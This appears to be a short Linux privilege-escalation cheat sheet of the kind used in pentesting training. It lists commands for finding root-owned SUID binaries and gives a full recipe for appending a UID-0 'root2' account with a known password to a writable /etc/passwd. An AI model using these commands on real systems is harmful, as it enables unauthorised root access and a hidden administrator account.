Enumerating Attack Vectors
Helpful Tools
Processes and Jobs
Kernel and OS
User-Related
Network Related
Finding Interesting Files and Directories
Enumerating SUID binaries
SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. Instead of the normal x
which represents execute permissions, you will see an s
(to indicate SUID) special permission for the user.
Obviously, for a quick win, you want to find SUID binaries having the root
user as the file's owner.
HackTricks has a page where more info about this topic is explained.
You can find
SUID binaries in many ways, the following are some example commands:
find / -perm -4000 2>/dev/null
find / -perm /4000 2>/dev/null
find / -perm /u+s 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Other Tricks - Miscellaneous
This section contains some specific things which could help you find unusual vectors to escalate your privileges.
Writeable passwd file
Always check whether you have write permissions into the /etc/passwd
file.
If that's the case, you can effectively set an arbitrary password for any account.
To check, use ls -la /etc/passwd
Supposing you have write permissions, you can generate a password hash
and use it to log as root
as follows:
Generate the password hash:
openssl passwd w00t output: Fdzt.eqJQ4s0g
Append the password hash inside the passwd file:
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
Now you can login as root using
su root2
and insertingw00t
as the user's password
Last updated